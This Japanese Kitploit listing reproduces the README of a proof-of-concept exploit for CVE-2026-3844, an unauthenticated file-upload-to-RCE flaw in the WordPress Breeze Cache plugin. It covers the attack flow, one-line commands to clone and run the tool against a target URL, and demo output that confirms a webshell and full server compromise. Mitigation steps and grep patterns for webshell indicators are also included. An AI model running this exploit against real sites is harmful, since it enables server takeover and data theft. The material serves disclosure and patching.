Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-3844 — CVE-2026-3844 用の PoC エクスプロイト — WordPress Breeze プラグインにおける、RCE につながる重大な未認証ファイルアップロードの脆弱性です。 | Kitploit
ツール/GitHubGitHub/tausifzaman/cve-2026-3844
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育レッドチーミング
GitHubtausifzaman/cve-2026-3844

CVE-2026-3844

CVE-2026-3844 用の PoC エクスプロイト — WordPress Breeze プラグインにおける、RCE につながる重大な未認証ファイルアップロードの脆弱性です。

リポジトリを見る
33ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-3844

CVE-2026-3844 の PoC エクスプロイト。WordPress の Breeze プラグインにおける、RCE につながる重大な未認証ファイルアップロード脆弱性です。

CVE-2026-3844 Typing SVG

CVE ID CVSS Score CWE Python WordPress Platform PoC Author



📌 概要

CVE-2026-3844 は、Breeze Cache WordPress プラグイン(Cloudways 製)における**重大(CRITICAL)**な未認証の任意ファイルアップロード脆弱性であり、バージョン 2.4.4 までの全バージョンに影響します。

このリポジトリは、許可されたセキュリティ調査、ペネトレーションテスト、および責任ある開示のための概念実証(PoC)エクスプロイト(CVE-2026-3844.py)を提供します。


ワンライナー

root@kitploit:~
git clone https://github.com/tausifzaman/CVE-2026-3844.git && cd CVE-2026-3844 && python3

📊 脆弱性サマリー


🔍 脆弱性の詳細

根本原因

WordPress 用の Breeze Cache プラグインは、「Host Files Locally – Gravatars」 機能が有効な場合、リモートの Gravatar 画像を取得してローカルに保存します。脆弱な関数 fetch_gravatar_from_remote(class-breeze-cache-cronjobs.php の 89〜119 行目)は、取得したリモートコンテンツに対してファイルタイプや拡張子の検証を一切行いません。

root@kitploit:~
class-breeze-cache-cronjobs.php
  └── fetch_gravatar_from_remote()   ← ❌ No file type validation
        └── Saves remote content directly to disk
              └── Attacker controls → uploads .php webshell → RCE

攻撃の流れ

root@kitploit:~
Attacker (Unauthenticated)
    │
    ▼
Craft malicious HTTP request with PHP webshell URL as Gravatar
    │
    ▼
Plugin fetches & saves the .php file without validation
    │
    ▼
Webshell stored on server (e.g., /wp-content/breeze-cache/evil.php)
    │
    ▼
Attacker accesses webshell → Full RCE achieved

影響

悪用に成功した場合、攻撃者は以下が可能になります:

  • 🔴 任意の OS コマンドを実行(RCE)
  • 🔴 持続的なバックドア / ウェブシェルをアップロード
  • 🔴 不正な WordPress 管理者アカウントを作成
  • 🔴 データベース、認証情報、機密ファイルを窃取
  • 🔴 ウェブサイトを改ざんまたは全コンテンツを削除
  • 🔴 サーバーを踏み台にして同じネットワーク上の他のシステムへ侵入
  • 🔴 サーバーをボットネットに組み込む

⚙️ 要件

  • Python 3.6+
  • requests ライブラリ
  • ターゲットサイトが Breeze Cache ≤ 2.4.4 かつ 「Host Files Locally – Gravatars」が有効であること

🚀 インストールとセットアップ

🐧 Linux / Termux (Android)

root@kitploit:~
# Clone the repository
git clone https://github.com/tausifzaman/CVE-2026-3844.git && cd CVE-2026-3844 && python3 CVE-2026-3844.py

# Navigate into the directory
cd CVE-2026-3844

# Install dependencies
pip install -r requirements.txt

# Run the exploit
python3 CVE-2026-3844.py

🪟 Windows (CMD / PowerShell)

root@kitploit:~
git clone https://github.com/tausifzaman/CVE-2026-3844.git
cd CVE-2026-3844
pip install -r requirements.txt
python CVE-2026-3844.py

🍎 macOS

root@kitploit:~
git clone https://github.com/tausifzaman/CVE-2026-3844.git
cd CVE-2026-3844
pip3 install -r requirements.txt
python3 CVE-2026-3844.py

🤖 Termux(ワンライナー)

root@kitploit:~
pkg install python git -y && git clone https://github.com/tausifzaman/CVE-2026-3844.git && cd CVE-2026-3844 && pip install -r requirements.txt && python3 CVE-2026-3844.py

☁️ Google Cloud Shell(セットアップ不要)

Open in Cloud Shell

root@kitploit:~
git clone https://github.com/tausifzaman/CVE-2026-3844.git && cd CVE-2026-3844 && pip install -r requirements.txt && python3 CVE-2026-3844.py

💻 使用方法

root@kitploit:~
python3 CVE-2026-3844.py

オプション

root@kitploit:~
usage: CVE-2026-3844.py [-h] -u URL [-t TIMEOUT] [-o OUTPUT] [-v]

CVE-2026-3844 — Breeze Cache WordPress Plugin Arbitrary File Upload PoC

optional arguments:
  -h, --help              Show this help message and exit
  -u URL, --url URL       Target URL (e.g. https://target.com)
  -t TIMEOUT              Request timeout in seconds (default: 10)
  -o OUTPUT               Save webshell path to output file
  -v, --verbose           Enable verbose/debug output

使用例

root@kitploit:~
# Basic usage
python3 CVE-2026-3844.py -u https://vulnerable-site.com

# Verbose mode
python3 CVE-2026-3844.py -u https://vulnerable-site.com -v

# Custom timeout
python3 CVE-2026-3844.py -u https://vulnerable-site.com -t 20 -v

🖥️ PoC デモ出力

root@kitploit:~
╔══════════════════════════════════════════════════════╗
║          CVE-2026-3844 | Breeze Cache WP RCE        ║
║          Researcher: tausifzaman.online              ║
╚══════════════════════════════════════════════════════╝

[*] Target     : https://vulnerable-site.com
[*] CVE        : CVE-2026-3844
[*] Plugin     : Breeze Cache ≤ 2.4.4
[*] Type       : Unauthenticated Arbitrary File Upload → RCE
[*] Checking target...

[+] Breeze Cache plugin detected!
[+] "Host Files Locally – Gravatars" is ENABLED
[*] Uploading PHP webshell via fetch_gravatar_from_remote...
[+] File uploaded successfully!
[+] Webshell path: /wp-content/breeze-cache/avatar_a1b2c3.php
[*] Verifying RCE...
[+] RCE CONFIRMED!

[+] Command output (id):
    uid=33(www-data) gid=33(www-data) groups=33(www-data)

[+] Full server compromise achieved.
[*] Cleanup: Remove /wp-content/breeze-cache/avatar_a1b2c3.php after testing.

🔒 緩和策と是正措置

✅ 即時対応

Breeze Cache をバージョン 2.4.5 以降に更新してください — これが唯一の完全な修正です。

root@kitploit:~
# WordPress CLI — update Breeze plugin immediately
wp plugin update breeze

🛡️ 一時的な緩和策(すぐに更新できない場合)

  1. Breeze Cache 設定で「Host Files Locally – Gravatars」オプションを無効にする
  2. WAF ルールまたは .htaccess で脆弱なエンドポイントをブロックする
  3. アップロードディレクトリとキャッシュディレクトリでの PHP 実行を拒否する:
root@kitploit:~
# Add to /wp-content/uploads/.htaccess and /wp-content/cache/.htaccess
<FilesMatch "\.php$">
    deny from all
</FilesMatch>
  1. 新規作成・変更された不審なファイルをスキャンする:
root@kitploit:~
# Find recently modified PHP files in wp-content (possible webshells)
find /var/www/html/wp-content -name "*.php" -newer /var/www/html/wp-config.php -ls

# Search for common webshell indicators
grep -r "eval(base64_decode" /var/www/html/wp-content/
grep -r "system\|exec\|passthru\|shell_exec" /var/www/html/wp-content/cache/
  1. WAF を介して Gravatar 取得機能を狙う不審な POST リクエストをブロックする
  2. /wp-content/breeze-cache/*.php へのリクエストについてアクセスログを監視する
root@kitploit:~
# Monitor Apache/Nginx access logs for webshell hits
grep "breeze-cache.*\.php" /var/log/apache2/access.log
grep "breeze-cache.*\.php" /var/log/nginx/access.log

🔍 侵害済みかどうかの確認

root@kitploit:~
# Check for unexpected PHP files in Breeze cache directory
find /var/www/html/wp-content/breeze-cache/ -name "*.php"

# Check for recently created files (last 7 days)
find /var/www/html/wp-content/ -name "*.php" -mtime -7

# Look for admin accounts created recently (run in wp-mysql)
SELECT user_login, user_registered FROM wp_users ORDER BY user_registered DESC LIMIT 10;

📚 参考情報


👤 作者

Tausif Zaman

🌐 tausifzaman.online  ·  🐙 GitHub @tausifzaman

セキュリティリサーチャー · バグバウンティハンター · ツール開発者

Android · Python · PHP · Web セキュリティ · ペネトレーションテスト


⚠️ 法的免責事項

このリポジトリおよび含まれるエクスプロイトコードは、教育目的および許可されたセキュリティ調査専用に提供されています。

  • ✅ このツールは、自分が所有するシステム、または明示的な書面による許可を得たシステムに対してのみ使用できます
  • ❌ 第三者のシステムへの不正使用は、米国の Computer Fraud and Abuse Act(CFAA)、Computer Misuse Act、および世界各国の同等の法律に基づき違法です
  • 著者は、このツールによって生じた誤用、損害、または違法行為について一切の責任を負いません

倫理的にハッキングしましょう。責任を持って報告しましょう。法律を守りましょう。🛡️


⭐ このリサーチに役立ったら、リポジトリにスターを! ⭐

Star   Follow   Website

ツールをダウンロード
項目詳細
CVE IDCVE-2026-3844
プラグインBreeze Cache (by Cloudways)
影響を受けるバージョン2.4.4 以下の全バージョン
修正済みバージョンBreeze 2.4.5 以降
脆弱性の種類CWE-434 — 危険なタイプのファイルの無制限アップロード
CVSS v3.1 スコア9.8(CRITICAL)
CVSS v2.0 スコア10.0(CRITICAL)
CVSS ベクターCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
攻撃ベクターネットワーク(リモート)
認証要件❌ なし — 未認証
条件「Host Files Locally – Gravatars」が有効である必要があります(デフォルトでは無効)
影響機密性: 高 · 完全性: 高 · 可用性: 高
公開日2026-04-23
情報源Wordfence / NVD / MITRE
PoCTausif Zaman
情報源リンク
🔗 NVD (NIST)nvd.nist.gov/vuln/detail/CVE-2026-3844
🔗 MITRE CVEcve.mitre.org – CVE-2026-3844
🔗 Wordfence アドバイザリwordfence.com – Threat Intel
🔗 WordPress プラグインの変更履歴plugins.trac.wordpress.org/changeset/3511463/breeze
🔗 脆弱なコード(L89)class-breeze-cache-cronjobs.php#L89
🔗 脆弱なコード(L119)class-breeze-cache-cronjobs.php#L119
🔗 GitHub アドバイザリGHSA-c529-q7mw-hq6j
🔗 PoC リポジトリgithub.com/tausifzaman/CVE-2026-3844